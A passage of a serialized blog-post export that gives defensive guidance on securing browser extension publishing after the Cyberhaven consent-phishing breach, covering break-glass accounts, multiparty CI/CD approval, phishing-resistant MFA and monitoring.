minutia of these attack paths, but some things to note about these attack paths are that they all target single points of failure (a single identity, a single endpoint), primarily through Social Engineering attacks:",[],{},{"nodeType":250,"data":163632,"content":163633},{},[163634,163644,163654],{"nodeType":254,"data":163635,"content":163636},{},[163637],{"nodeType":178,"data":163638,"content":163639},{},[163640],{"nodeType":173,"value":163641,"marks":163642,"data":163643},"A single user with access to the store needs to fall for a social engineering attack for this to work (as happened in this case). ",[],{},{"nodeType":254,"data":163645,"content":163646},{},[163647],{"nodeType":178,"data":163648,"content":163649},{},[163650],{"nodeType":173,"value":163651,"marks":163652,"data":163653},"Many paths can be completed with an identity or endpoint attack, and in most cases a single identity or endpoint is sufficient.",[],{},{"nodeType":254,"data":163655,"content":163656},{},[163657],{"nodeType":178,"data":163658,"content":163659},{},[163660],{"nodeType":173,"value":163661,"marks":163662,"data":163663},"Attacks against code repos and CI/CD flows are parallel paths, you need to trust those systems already.",[],{},{"nodeType":178,"data":163665,"content":163666},{},[163667],{"nodeType":173,"value":163668,"marks":163669,"data":163670},"So in designing a security architecture, we want to do as much to reduce single points of failure, and make social engineering ineffective (even when it succeeds).",[],{},{"nodeType":231,"data":163672,"content":163673},{},[],{"nodeType":169,"data":163675,"content":163676},{},[163677],{"nodeType":173,"value":163678,"marks":163679,"data":163680},"Recommended security architecture",[],{},{"nodeType":178,"data":163682,"content":163683},{},[163684],{"nodeType":173,"value":163685,"marks":163686,"data":163687},"You could literally write a book on everything it takes to secure identities, endpoints and code repositories in general, and we’ll certainly mention some of the identity controls we think are effective later on. One thing to note here is that whatever you implement, the attack that succeeds in the real-word today is vastly more likely to involve an element of social engineering vs. for example a vulnerability exploit. This is not just my opinion (solid as I like to think that is), but also well supported by threat reports like the Verizon DBIR, with 68% of attacks involving ‘the human element’ in the 2024 edition. ",[],{},{"nodeType":178,"data":163689,"content":163690},{},[163691],{"nodeType":173,"value":163692,"marks":163693,"data":163694},"In tackling attacks that involve social engineering, there are two main workable options:",[],{},{"nodeType":250,"data":163696,"content":163697},{},[163698,163708],{"nodeType":254,"data":163699,"content":163700},{},[163701],{"nodeType":178,"data":163702,"content":163703},{},[163704],{"nodeType":173,"value":163705,"marks":163706,"data":163707},"Remove the user’s ability to give the attacker what they need.",[],{},{"nodeType":254,"data":163709,"content":163710},{},[163711],{"nodeType":178,"data":163712,"content":163713},{},[163714],{"nodeType":173,"value":163715,"marks":163716,"data":163717},"Assume that at least some users will fall for the attack, and make it as hard as possible for the attacker.",[],{},{"nodeType":178,"data":163719,"content":163720},{},[163721],{"nodeType":173,"value":163722,"marks":163723,"data":163724},"You may note I didn’t include security or awareness training in the above — essentially because I’ve never seen it be effective enough to be relied on, which is not to say it’s not very useful (especially if it’s well targeted and relevant — like unpacking what happened to Cyberhaven with your whole extension developer team would be!), just that technical controls are generally more reliable.",[],{},{"nodeType":178,"data":163726,"content":163727},{},[163728],{"nodeType":173,"value":163729,"marks":163730,"data":163731},"Anyway, back to what I think makes the cornerstones of a solution.",[],{},{"nodeType":235,"data":163733,"content":163734},{},[163735],{"nodeType":173,"value":163736,"marks":163737,"data":163738},"Remove BAU access to extension stores",[],{},{"nodeType":178,"data":163740,"content":163741},{},[163742],{"nodeType":173,"value":163743,"marks":163744,"data":163745},"If developers don’t have access to extension stores, they cannot be manipulated into giving attackers access to API keys, they cannot grant attackers authorization to access the store on their behalf, and if the identities are compromised they cannot be used to access the store.",[],{},{"nodeType":178,"data":163747,"content":163748},{},[163749],{"nodeType":173,"value":163750,"marks":163751,"data":163752},"The key to achieving this is to lean fully into completely automated CI/CD processes for normal extension updates. This means that after you’ve configured the CI/CD flows, no developer needs access to the extension stores to do their normal work (publishing new versions of the extension).",[],{},{"nodeType":178,"data":163754,"content":163755},{},[163756],{"nodeType":173,"value":163757,"marks":163758,"data":163759},"Unfortunately, you will still need to access the web console manually for some tasks like updating branding, updating extension descriptions, and proving justification for new permissions (Chrome and Apple only). For our team, these tasks are infrequent enough that they can be handled using break-glass accounts.",[],{},{"nodeType":178,"data":163761,"content":163762},{},[163763],{"nodeType":173,"value":163764,"marks":163765,"data":163766},"A side note here: it might seem that you are just moving the risk around, from the extension store to the code repo & CI/CD system, but you are really already dependent on the security of these systems, so this is just removing the direct access to the extension store from the attack surface. You also have far greater flexibility and control in the CI/CD system as we’ll see in the “Implement multiparty approval in CI/CD” section below.",[],{},{"nodeType":235,"data":163768,"content":163769},{},[163770],{"nodeType":173,"value":163771,"marks":163772,"data":163773},"Break-glass store admin accounts",[],{},{"nodeType":178,"data":163775,"content":163776},{},[163777,163781,163790,163794,163803],{"nodeType":173,"value":163778,"marks":163779,"data":163780},"In practice you might implement this by issuing developers that need access to the extension stores a second SSO identity that is dedicated to this. You could have a ",[],{},{"nodeType":186,"data":163782,"content":163784},{"uri":163783},"mailto:john@amce.com",[163785],{"nodeType":173,"value":163786,"marks":163787,"data":163789},"john@acme.com",[163788],{"type":194},{},{"nodeType":173,"value":163791,"marks":163792,"data":163793}," Google account to do normal development work, and a ",[],{},{"nodeType":186,"data":163795,"content":163797},{"uri":163796},"mailto:john.admin@acme.com",[163798],{"nodeType":173,"value":163799,"marks":163800,"data":163802},"john.admin@acme.com",[163801],{"type":194},{},{"nodeType":173,"value":163804,"marks":163805,"data":163806}," Google account to access the extension stores. You could also:",[],{},{"nodeType":250,"data":163808,"content":163809},{},[163810,163820,163830,163840],{"nodeType":254,"data":163811,"content":163812},{},[163813],{"nodeType":178,"data":163814,"content":163815},{},[163816],{"nodeType":173,"value":163817,"marks":163818,"data":163819},"Make the .admin accounts disabled by default in Google, and enable one of them at a time as and when needed (this should be very rare).",[],{},{"nodeType":254,"data":163821,"content":163822},{},[163823],{"nodeType":178,"data":163824,"content":163825},{},[163826],{"nodeType":173,"value":163827,"marks":163828,"data":163829},"Put the .admin accounts in a separate OU in GWS, and configure that OU so that those accounts are not allowed to authorize any OAuth integrations.",[],{},{"nodeType":254,"data":163831,"content":163832},{},[163833],{"nodeType":178,"data":163834,"content":163835},{},[163836],{"nodeType":173,"value":163837,"marks":163838,"data":163839},"Ensure that all the .admin accounts use hardware backed passkeys that don’t sync anywhere (we like Yubikeys) and disable password logins.",[],{},{"nodeType":254,"data":163841,"content":163842},{},[163843],{"nodeType":178,"data":163844,"content":163845},{},[163846],{"nodeType":173,"value":163847,"marks":163848,"data":163849},"For bonus points, make sure .admin accounts can only be used on a separate dedicated endpoint (e.g. a locked-down Chromebook).",[],{},{"nodeType":178,"data":163851,"content":163852},{},[163853],{"nodeType":173,"value":163854,"marks":163855,"data":163856},"In this way you can have a setup where an attacker would have to successfully target a developer using a hardware-backed identity during the few minutes a year their account is active, and do so without using consent phishing attacks (because all OAuth integrations are disabled for your break-glass accounts). This is a majorly tall order for the attacker.",[],{},{"nodeType":235,"data":163858,"content":163859},{},[163860],{"nodeType":173,"value":163861,"marks":163862,"data":163863},"Implement multiparty approval in CI/CD",[],{},{"nodeType":178,"data":163865,"content":163866},{},[163867],{"nodeType":173,"value":163868,"marks":163869,"data":163870},"If nobody has active BAU access to extension stores for more than very brief periods, the attacker’s next best option is to target the process that developers are using to publish, i.e. committing code to the repository and waiting for the CI/CD system to publish the extension automatically.",[],{},{"nodeType":178,"data":163872,"content":163873},{},[163874],{"nodeType":173,"value":163875,"marks":163876,"data":163877},"In practice this means the attacker would need to attack the identity (account) the employee uses to access the code repository (assuming a typical cloud hosted system like GitHub here), or sneak code in through an endpoint attack. Overwhelmingly, these attacks are likely to include an element of social engineering — whether that’s phishing credentials or session tokens, or tricking the user into downloading malware, perhaps through a malicious dependency or vscode extension.",[],{},{"nodeType":178,"data":163879,"content":163880},{},[163881],{"nodeType":173,"value":163882,"marks":163883,"data":163884},"We can make the attacker’s life exponentially harder by requiring that they successfully attack two developers, at the same time, before anyone notices. Quick intuition might make it seem like we’re only doubling the difficulty, but other red-teamers with experience doing this will agree that it’s often very easy to target a random user in a large population quickly (one employee in a large corporate), but a single user in a much smaller team (say an extension dev team) might take repeated attacks. When you need to target multiple users in a small team, in a single attack, and maintain the breach concurrently while taking actions (e.g. committing malicious code hoping no-one notices) it becomes much more likely that the alarm will be raised. ",[],{},{"nodeType":235,"data":163886,"content":163887},{},[163888],{"nodeType":173,"value":163889,"marks":163890,"data":163891},"How to implement multiparty approval through CI/CD",[],{},{"nodeType":178,"data":163893,"content":163894},{},[163895],{"nodeType":173,"value":163896,"marks":163897,"data":163898},"There are probably dozens of ways to skin this cat, but I’ll share one way of doing this that works with mainstream tools and developer processes — using protected git branches.",[],{},{"nodeType":250,"data":163900,"content":163901},{},[163902,163917,163932],{"nodeType":254,"data":163903,"content":163904},{},[163905],{"nodeType":178,"data":163906,"content":163907},{},[163908,163913],{"nodeType":173,"value":163909,"marks":163910,"data":163912},"Step 1: ",[163911],{"type":370},{},{"nodeType":173,"value":163914,"marks":163915,"data":163916},"Setup multiple branches, these might be dev/stg/prd, or development/prerelease/release, and trigger automated build and deploy to the stores using CI/CD with PR merges to the prd/release branches. ",[],{},{"nodeType":254,"data":163918,"content":163919},{},[163920],{"nodeType":178,"data":163921,"content":163922},{},[163923,163928],{"nodeType":173,"value":163924,"marks":163925,"data":163927},"Step 2: ",[163926],{"type":370},{},{"nodeType":173,"value":163929,"marks":163930,"data":163931},"Use branch protection rules that require a second (or even third) named or group of developers to review and approve the PR merge. This achieves multiparty approval.",[],{},{"nodeType":254,"data":163933,"content":163934},{},[163935],{"nodeType":178,"data":163936,"content":163937},{},[163938,163943],{"nodeType":173,"value":163939,"marks":163940,"data":163942},"Step 3:",[163941],{"type":370},{},{"nodeType":173,"value":163944,"marks":163945,"data":163946}," Configure fully automated builds and deployments as part of your CI/CD flows. While this is possible for all three stores, some of the stores do make you jump through a few hoops. Take a look at the steps required to automate a publish to the Apple Store:",[],{},{"nodeType":312,"data":163948,"content":163952},{"target":163949},{"sys":163950},{"id":163951,"type":317,"linkType":318},"4b9fc1ZUj4HdKl6Iv7Yx8T",[],{"nodeType":178,"data":163954,"content":163955},{},[163956,163960,163969],{"nodeType":173,"value":163957,"marks":163958,"data":163959},"Since we’ve done the work of figuring this out once already, we extracted the critical steps into a ",[],{},{"nodeType":186,"data":163961,"content":163963},{"uri":163962},"https://github.com/pushsecurity/extension-security-guide",[163964],{"nodeType":173,"value":163965,"marks":163966,"data":163968},"companion Github repo",[163967],{"type":194},{},{"nodeType":173,"value":163970,"marks":163971,"data":163972}," to make this a bit easier to implement.",[],{},{"nodeType":178,"data":163974,"content":163975},{},[163976],{"nodeType":173,"value":163977,"marks":163978,"data":163979},"As we’ve described it so far, this is a fairly basic implementation, and there are several other controls you might consider to harden this process, including:",[],{},{"nodeType":250,"data":163981,"content":163982},{},[163983,163993,164003],{"nodeType":254,"data":163984,"content":163985},{},[163986],{"nodeType":178,"data":163987,"content":163988},{},[163989],{"nodeType":173,"value":163990,"marks":163991,"data":163992},"Make sure you use a secrets protection system to store Web Store API keys in the CI/CD (it’s no use if the attacker can read the API keys from a config file in your code).",[],{},{"nodeType":254,"data":163994,"content":163995},{},[163996],{"nodeType":178,"data":163997,"content":163998},{},[163999],{"nodeType":173,"value":164000,"marks":164001,"data":164002},"Ensure that developers don’t have access to change branch protection rules, or access CI/CD secrets (otherwise one compromised developer account can undo all this good work — let DevOps or other admin users that are not extension developers handle this admin).",[],{},{"nodeType":254,"data":164004,"content":164005},{},[164006],{"nodeType":178,"data":164007,"content":164008},{},[164009],{"nodeType":173,"value":164010,"marks":164011,"data":164012},"Enforce hardware-backed signed commits as a condition for PR merges (this makes it very very difficult to get bad code into the repo without also compromising your dev team’s Yubikeys)",[],{},{"nodeType":178,"data":164014,"content":164015},{},[164016],{"nodeType":173,"value":164017,"marks":164018,"data":164019},"Now you have strong hardware-backed multiparty authenticated deployments to the stores, and should end up with something that looks a bit like this:",[],{},{"nodeType":312,"data":164021,"content":164025},{"target":164022},{"sys":164023},{"id":164024,"type":317,"linkType":318},"6tWdfgYKyH2i2Zai05BxzB",[],{"nodeType":231,"data":164027,"content":164028},{},[],{"nodeType":169,"data":164030,"content":164031},{},[164032],{"nodeType":173,"value":164033,"marks":164034,"data":164035},"The next best attack path — IdP admin compromise",[],{},{"nodeType":178,"data":164037,"content":164038},{},[164039],{"nodeType":173,"value":164040,"marks":164041,"data":164042},"Once developers don’t have direct access to the stores, and you have multiparty approvals to get code into CI/CD, the next best attack paths are to target other single-points-of-failure — most likely the administrators. ",[],{},{"nodeType":178,"data":164044,"content":164045},{},[164046],{"nodeType":173,"value":164047,"marks":164048,"data":164049},"This might be the IdP (Google Workspace, Entra, Okta, etc.) admins, which can then be used to provision access to the stores, or simply recover one or more of the developer or break-glass accounts. Or it might target the code repo or CI/CD (GitHub in our example) admins which have access to API keys and can change branch protection rules.",[],{},{"nodeType":178,"data":164051,"content":164052},{},[164053],{"nodeType":173,"value":164054,"marks":164055,"data":164056},"Managing privileged identities like these admin accounts is a constant challenge, but continuing what is perhaps the central thread of this blog, identity attacks (likely through social engineering) are going to be the first port of call for an attacker.",[],{},{"nodeType":235,"data":164058,"content":164059},{},[164060],{"nodeType":173,"value":164061,"marks":164062,"data":164063},"Recommendations for hardening admin identities",[],{},{"nodeType":178,"data":164065,"content":164066},{},[164067],{"nodeType":173,"value":164068,"marks":164069,"data":164070},"If there’s one thing we know here at Push, it’s identity security — but I’ll fight the urge to go into too much depth with generic recommendations, and focus on where there are opportunities specific to this scope.",[],{},{"nodeType":178,"data":164072,"content":164073},{},[164074],{"nodeType":173,"value":164075,"marks":164076,"data":164077},"One of the most critical aspects of securing these admin accounts is making sure that they are phishing resistant. Where possible, you should be using phishing resistant MFA methods. Typically this means some kind of domain bound security key using the WebAuthn protocol — a passkey using your fingerprint reader is good, something like Yubikey is great. I think this is pretty well understood, but where it goes wrong most often is when backup methods and alternative login methods exist. For example, you might be using an Google OIDC login secured with a Yubikey to access the Firefox store, but not realize that this account also has a password to set that doesn’t have MFA, or has phish-able MFA like SMS or an app-code set.",[],{},{"nodeType":178,"data":164079,"content":164080},{},[164081],{"nodeType":173,"value":164082,"marks":164083,"data":164084},"Attackers are increasingly using attacks that downgrade MFA methods (so the attacker will request the least secure active MFA method when phishing you, rather than the strong method you might use day-to-day), and this is completely automated in modern MFA-bypass phishing kits.",[],{},{"nodeType":178,"data":164086,"content":164087},{},[164088],{"nodeType":173,"value":164089,"marks":164090,"data":164091},"Warning, product plug coming 🙂 — what we do at Push is help you identify issues like these at scale, across all admin, break-glass, dev, and normal user accounts. We also block credential phishing by detecting when users try to enter their SSO credentials on the wrong page, detecting session theft, and can even monitor when credentials stolen via infostealers show up on underground forums.",[],{},{"nodeType":231,"data":164093,"content":164094},{},[],{"nodeType":169,"data":164096,"content":164097},{},[164098],{"nodeType":173,"value":164099,"marks":164100,"data":164101},"Going even further to harden extension deployment",[],{},{"nodeType":178,"data":164103,"content":164104},{},[164105],{"nodeType":173,"value":164106,"marks":164107,"data":164108},"This blog is already getting way too long, but there are a lot of other controls that can really help harden extension deployment — if there is interest I might go into detail in a future blog post, but for now let me just mention some of them.",[],{},{"nodeType":235,"data":164110,"content":164111},{},[164112],{"nodeType":173,"value":164113,"marks":164114,"data":164115},"Multiparty approvals for Google",[],{},{"nodeType":178,"data":164117,"content":164118},{},[164119],{"nodeType":173,"value":164120,"marks":164121,"data":164122},"If you’re going to do multiparty approvals for extension deployments, then enabling this for admin actions that protect that infrastructure seems like a no-brainer.",[],{},{"nodeType":178,"data":164124,"content":164125},{},[164126,164130,164139],{"nodeType":173,"value":164127,"marks":164128,"data":164129},"Google allows you to enable ",[],{},{"nodeType":186,"data":164131,"content":164133},{"uri":164132},"https://support.google.com/a/answer/13790448?hl=en",[164134],{"nodeType":173,"value":164135,"marks":164136,"data":164138},"multiparty approval for sensitive actions",[164137],{"type":194},{},{"nodeType":173,"value":164140,"marks":164141,"data":164142}," in Google Workspace. We wish it was a bit more granular, and covered more configurable actions — but it’s an awesome start, nice work Google!",[],{},{"nodeType":235,"data":164144,"content":164145},{},[164146],{"nodeType":173,"value":164147,"marks":164148,"data":164149},"Admin workstations",[],{},{"nodeType":178,"data":164151,"content":164152},{},[164153],{"nodeType":173,"value":164154,"marks":164155,"data":164156},"When we used to do red-team exercises, one of the most challenging controls to work around was when the admin accounts we were targeting were only used on dedicated admin workstations. Ideally those workstations would do nothing except admin tasks, and the accounts would be locked down, so in this case that might mean:",[],{},{"nodeType":250,"data":164158,"content":164159},{},[164160,164170,164180],{"nodeType":254,"data":164161,"content":164162},{},[164163],{"nodeType":178,"data":164164,"content":164165},{},[164166],{"nodeType":173,"value":164167,"marks":164168,"data":164169},"No email access",[],{},{"nodeType":254,"data":164171,"content":164172},{},[164173],{"nodeType":178,"data":164174,"content":164175},{},[164176],{"nodeType":173,"value":164177,"marks":164178,"data":164179},"No extensions",[],{},{"nodeType":254,"data":164181,"content":164182},{},[164183],{"nodeType":178,"data":164184,"content":164185},{},[164186],{"nodeType":173,"value":164187,"marks":164188,"data":164189},"No OAuth apps",[],{},{"nodeType":178,"data":164191,"content":164192},{},[164193],{"nodeType":173,"value":164194,"marks":164195,"data":164196},"This becomes incredibly challenging to attack — but it does come with some obvious painful UX impact for admins, so I don’t think this is a no-brainer for everyone.",[],{},{"nodeType":235,"data":164198,"content":164199},{},[164200],{"nodeType":173,"value":164201,"marks":164202,"data":164203},"Isolate support emails",[],{},{"nodeType":178,"data":164205,"content":164206},{},[164207],{"nodeType":173,"value":164208,"marks":164209,"data":164210},"Sending your support emails to extension developers creates a direct path to start social engineering — something attackers used to great effect in this campaign. If your developers are not also your frontline support team, consider ringfencing developers from that public support email group so attackers have to at least do some reconnaissance work to identify the developers to target.",[],{},{"nodeType":235,"data":164212,"content":164213},{},[164214],{"nodeType":173,"value":164215,"marks":164216,"data":164217},"Detection and response",[],{},{"nodeType":178,"data":164219,"content":164220},{},[164221],{"nodeType":173,"value":164222,"marks":164223,"data":164224},"As always there are a myriad of things that can be monitored. We think high value would be doing things like:",[],{},{"nodeType":250,"data":164226,"content":164227},{},[164228,164271,164281],{"nodeType":254,"data":164229,"content":164230},{},[164231,164238],{"nodeType":178,"data":164232,"content":164233},{},[164234],{"nodeType":173,"value":164235,"marks":164236,"data":164237},"Checking whether new versions of your extension appearing in the store is directly related or caused by the CI/CD process, and:",[],{},{"nodeType":250,"data":164239,"content":164240},{},[164241,164251,164261],{"nodeType":254,"data":164242,"content":164243},{},[164244],{"nodeType":178,"data":164245,"content":164246},{},[164247],{"nodeType":173,"value":164248,"marks":164249,"data":164250},"Alert if there is no direct link here.",[],{},{"nodeType":254,"data":164252,"content":164253},{},[164254],{"nodeType":178,"data":164255,"content":164256},{},[164257],{"nodeType":173,"value":164258,"marks":164259,"data":164260},"You can configure email alerts to trigger this automated check.",[],{},{"nodeType":254,"data":164262,"content":164263},{},[164264],{"nodeType":178,"data":164265,"content":164266},{},[164267],{"nodeType":173,"value":164268,"marks":164269,"data":164270},"You could consider immediate automated roll-back to a previous version of the extension if it wasn’t published via the CI/CD system.",[],{},{"nodeType":254,"data":164272,"content":164273},{},[164274],{"nodeType":178,"data":164275,"content":164276},{},[164277],{"nodeType":173,"value":164278,"marks":164279,"data":164280},"Any activity on break-glass accounts — these accounts should only be used after they are activated by admins to complete a specific task, so this is an obvious alert to configure.",[],{},{"nodeType":254,"data":164282,"content":164283},{},[164284],{"nodeType":178,"data":164285,"content":164286},{},[164287],{"nodeType":173,"value":164288,"marks":164289,"data":164290},"Unusual activity on service accounts — this is a bit of work to profile, but very valuable.",[],{},{"nodeType":231,"data":164292,"content":164293},{},[],{"nodeType":169,"data":164295,"content":164296},{},[164297],{"nodeType":173,"value":164298,"marks":164299,"data":164300},"Our request to extension stores",[],{},{"nodeType":178,"data":164302,"content":164303},{},[164304],{"nodeType":173,"value":164305,"marks":164306,"data":164307},"I’ll use this opportunity to make an open request to the browser extension stores for a couple of features that I think would really benefit the entire ecosystem:",[],{},{"nodeType":250,"data":164309,"content":164310},{},[164311,164321,164331,164341],{"nodeType":254,"data":164312,"content":164313},{},[164314],{"nodeType":178,"data":164315,"content":164316},{},[164317],{"nodeType":173,"value":164318,"marks":164319,"data":164320},"Add the ability to configure an explicit multiparty approval process (and show the public which extensions have enabled these controls!).",[],{},{"nodeType":254,"data":164322,"content":164323},{},[164324],{"nodeType":178,"data":164325,"content":164326},{},[164327],{"nodeType":173,"value":164328,"marks":164329,"data":164330},"More granular permissions or roles (e.g. only edit descriptions, only only upload, only publish, only accept new terms).",[],{},{"nodeType":254,"data":164332,"content":164333},{},[164334],{"nodeType":178,"data":164335,"content":164336},{},[164337],{"nodeType":173,"value":164338,"marks":164339,"data":164340},"Better logs and monitoring – making it easier to ingest events related to your extension via the store into a SIEM would make alerts much easier to configure.",[],{},{"nodeType":254,"data":164342,"content":164343},{},[164344],{"nodeType":178,"data":164345,"content":164346},{},[164347],{"nodeType":173,"value":164348,"marks":164349,"data":164350},"Enforce stronger default identity security controls (even if only for risky or popular extensions) — we enforce MFA by default for GitHub repositories now, it’s about time that we require MFA to access an extension store as well.",[],{},{"nodeType":231,"data":164352,"content":164353},{},[],{"nodeType":169,"data":164355,"content":164356},{},[164357],{"nodeType":173,"value":40632,"marks":164358,"data":164359},[],{},{"nodeType":178,"data":164361,"content":164362},{},[164363],{"nodeType":173,"value":164364,"marks":164365,"data":164366},"We’ve seen in the past that the successful use of new techniques seem to inspire other attackers and lead to many similar attacks, so the smart money is on this happening again.",[],{},{"nodeType":178,"data":164368,"content":164369},{},[164370,164374,164383],{"nodeType":173,"value":164371,"marks":164372,"data":164373},"There is lots to work needed to secure this process, and hopefully this blog has provided a starting point. We’d love to hear from you — let’s start ",[],{},{"nodeType":186,"data":164375,"content":164377},{"uri":164376},"https://github.com/pushsecurity/extension-security-guide/discussions",[164378],{"nodeType":173,"value":164379,"marks":164380,"data":164382},"sharing some ideas",[164381],{"type":194},{},{"nodeType":173,"value":164384,"marks":164385,"data":164386}," around hardening this process even more!",[],{},{"nodeType":178,"data":164388,"content":164389},{},[164390],{"nodeType":173,"value":164391,"marks":164392,"data":164393},"If you're a customer rather than an extension developer, this guide hopefully gives you a sense of the supply chain attacks that are likely to happen in the future. Asking your vendors which steps they’ve taken to prevent these attacks might be a sensible addition to your vendor risk assessment process (when the product includes a browser extension). ",[],{},{"nodeType":178,"data":164395,"content":164396},{},[164397],{"nodeType":173,"value":164398,"marks":164399,"data":164400},"This kind of due diligence is viable where the developer is a vendor you have a commercial relationship with, but is a non-starter when it’s an extension that’s offered for free by well meaning open source developers. In these cases a sensible response might be to require approvals for new browser extensions, a technical risk review based on (at least) the permissions the extension is asking for, and managed browser policies to control and further limit what some or all extensions can do. For example, you may decide to block access for extensions to your IdP’s domains to protect your SSO accounts. ",[],{},{"nodeType":178,"data":164402,"content":164403},{},[164404],{"nodeType":173,"value":164405,"marks":164406,"data":164407},"We’ll be releasing guidance on how to manage third party extensions used in your organization in the near future — subscribe to our mailing list to be notified when we do.",[],{},{"nodeType":231,"data":164409,"content":164410},{},[],{"nodeType":169,"data":164412,"content":164413},{},[164414],{"nodeType":173,"value":164415,"marks":164416,"data":164417},"Appendix: Extension store differences",[],{},{"nodeType":178,"data":164419,"content":164420},{},[164421],{"nodeType":173,"value":164422,"marks":164423,"data":164424},"We covered the general process of publishing extensions to the different stores in the “Primer on extension stores and the publication process” section above, now let’s talk about the differences between the stores. Let’s start with how they provision for automated deployments.",[],{},{"nodeType":235,"data":164426,"content":164427},{},[164428],{"nodeType":173,"value":164429,"marks":164430,"data":164431},"Automation keys",[],{},{"nodeType":178,"data":164433,"content":164434},{},[164435,164439,164448],{"nodeType":173,"value":164436,"marks":164437,"data":164438},"The Chrome Web Store allows automation through an OAuth app. As described in ",[],{},{"nodeType":186,"data":164440,"content":164442},{"uri":164441},"https://developer.chrome.com/docs/webstore/using-api",[164443],{"nodeType":173,"value":164444,"marks":164445,"data":164447},"their documentation",[164446],{"type":194},{},{"nodeType":173,"value":164449,"marks":164450,"data":164451},", the process is for a developer to create a custom OAuth app (a client on OAuth speak), then a user with access to the store authorizes the OAuth app to access the chrome store on their behalf using the https://www.googleapis.com/auth/chromewebstore scope. ",[],{},{"nodeType":178,"data":164453,"content":164454},{},[164455],{"nodeType":173,"value":164456,"marks":164457,"data":164458},"If this sounds familiar, that’s because this is exactly what attackers tricked developers into doing using their own OAuth app in the Cyberhave campaign. In the normal flow, the developer then uses a service key linked to the OAuth app in their CI/CD flow to automate the deployment process.",[],{},{"nodeType":178,"data":164460,"content":164461},{},[164462],{"nodeType":173,"value":164463,"marks":164464,"data":164465},"The situation is a bit simpler for Firefox and Apple, which both work by developers just creating simple static API keys, though Apple does allow you to create personal API keys linked to a single account (and that account’s permissions).",[],{},{"nodeType":235,"data":164467,"content":164468},{},[164469],{"nodeType":173,"value":164470,"marks":164471,"data":164472},"Accessing the store",[],{},{"nodeType":178,"data":164474,"content":164475},{},[164476],{"nodeType":173,"value":164477,"marks":164478,"data":164479},"In a business environment, using SSO to access apps is extremely useful as it simplifies the provisioning and security-ops work of maintaining secure identities — and often provides more secure authentication methods (e.g. hardware backed WebAuthn MFA) than the target app does (as is the case for the web stores). It also simplifies and centralizes the ability to log and monitor the use of these accounts. I can’t recommend the use of strong SSO authentication enough in cases like this where ensuring you have the right controls in place is paramount.",[],{},{"nodeType":178,"data":164481,"content":164482},{},[164483],{"nodeType":173,"value":164484,"marks":164485,"data":164486},"Fortunately all the stores provide SSO login methods. For the Chrome store, users login (only) using Google SSO accounts — and if they are part of a Google Workspace, access can be provisioned through membership to a group. Firefox allows access using a username and password, but also offers OIDC SSO logins through Google or Apple accounts. If you make use of Managed Apple IDs, Apple offers OIDC SSO authentication as well. ",[],{},{"nodeType":178,"data":164488,"content":164489},{},[164490,164494,164499],{"nodeType":173,"value":164491,"marks":164492,"data":164493},"For Chrome and Firefox there is no real concept of roles (or nothing really useful), and ",[],{},{"nodeType":173,"value":164495,"marks":164496,"data":164498},"you should assume any user with access to a team in your account has the ability to publish extension updates",[164497],{"type":194},{},{"nodeType":173,"value":164500,"marks":164501,"data":164502},". Apple offers more granular roles and permissions - and there are low privileged roles that can’t publish updates.",[],{},{"entries":164504},{"hyperlink":164505,"inline":164506,"block":164507},[],[],[164508,164516,164523],{"sys":164509,"__typename":5345,"title":164510,"caption":164511,"layoutMode":118,"file":164512},{"id":163622},"Attack paths to publishing a malicious extension","Graphic showing the possible high-level attack paths to publishing a malicious extension. The path in bold (consent phishing) represents the path traversed in the Cyberhaven breach. ",{"url":164513,"width":164514,"height":164515},"https://images.ctfassets.net/y1cdw1ablpvd/449fRkebgBONYaYRJQuZZd/f1b9d7487dd6208516a760b5cac458a4/Attack_paths_to_publishing_a_malicious_extension.png",1423,1912,{"sys":164517,"__typename":5345,"title":164518,"caption":164518,"layoutMode":118,"file":164519},{"id":163951},"Steps required to automate a publish to the Apple store",{"url":164520,"width":164521,"height":164522},"https://images.ctfassets.net/y1cdw1ablpvd/63QG3teGwNduKQkKP7QfVo/7a78a4b433ab426bd6b8935b0701137c/image2.png",676,506,{"sys":164524,"__typename":5345,"title":164525,"caption":164526,"layoutMode":118,"file":164527},{"id":164024},"Secure multiparty auth diagram","Strong hardware-backed multiparty authenticated deployments to the stores",{"url":164528,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/6j4ZRB7D1VA7TfcvIED9Q1/ebf88ffa4082759f77f5a99594a1a9b7/Secure_multiparty_auth_diagram__3_.png","content:blog:guide-to-secure-browser-extension-deployment.json","blog/guide-to-secure-browser-extension-deployment.json","blog/guide-to-secure-browser-extension-deployment",{"_path":164533,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":164534,"summary":164536,"title":114081,"subtitle":118,"metaTitle":164546,"synopsis":150597,"hashTags":118,"publishedDate":150598,"slug":114082,"tagsCollection":164547,"relatedBlogPostsCollection":164551,"ogImage":166764,"authorsCollection":166766,"content":166770,"_id":167330,"_type":5439,"_source":5440,"_file":167331,"_stem":167332,"_extension":5439},"/blog/2024-identity-breaches",{"id":113695,"publishedAt":164535},"2026-01-30T09:10:57.289Z",{"json":164537},{"data":164538,"content":164539,"nodeType":165},{},[164540],{"data":164541,"content":164542,"nodeType":178},{},[164543],{"data":164544,"marks":164545,"value":150597,"nodeType":173},{},[],"Public breaches from identity attacks in 2024",{"items":164548},[164549],{"sys":164550,"name":505},{"id":504},{"items":164552},[164553,165167,165449],{"__typename":1528,"sys":164554,"content":164555,"title":46310,"synopsis":155637,"hashTags":118,"publishedDate":155638,"slug":46311,"tagsCollection":165157,"authorsCollection":165163},{"id":24713},{"json":164556},{"nodeType":165,"data":164557,"content":164558},{},[164559,164564,164567,164580,164586,164592,164597,164603,164619,164634,164640,164645,164651,164654,164660,164666,164672,164678,164684,164690,164719,164724,164730,164733,164739,164745,164843,164849,164865,164871,164887,164893,164910,164916,164932,164935,164941,164947,164953,164979,164985,164991,165006,165011,165017,165023,165028,165034,165091,165097,165103,165109,165115,165121,165124,165130,165146,165151],{"nodeType":312,"data":164560,"content":164563},{"target":164561},{"sys":164562},{"id":154952,"type":317,"linkType":318},[],{"nodeType":231,"data":164565,"content":164566},{},[],{"nodeType":178,"data":164568,"content":164569},{},[164570,164573,164577],{"nodeType":173,"value":154961,"marks":164571,"data":164572},[],{},{"nodeType":173,"value":154965,"marks":164574,"data":164576},[164575],{"type":1646},{},{"nodeType":173,"value":154970,"marks":164578,"data":164579},[],{},{"nodeType":178,"data":164581,"content":164582},{},[164583],{"nodeType":173,"value":154977,"marks":164584,"data":164585},[],{},{"nodeType":178,"data":164587,"content":164588},{},[164589],{"nodeType":173,"value":154984,"marks":164590,"data":164591},[],{},{"nodeType":312,"data":164593,"content":164596},{"t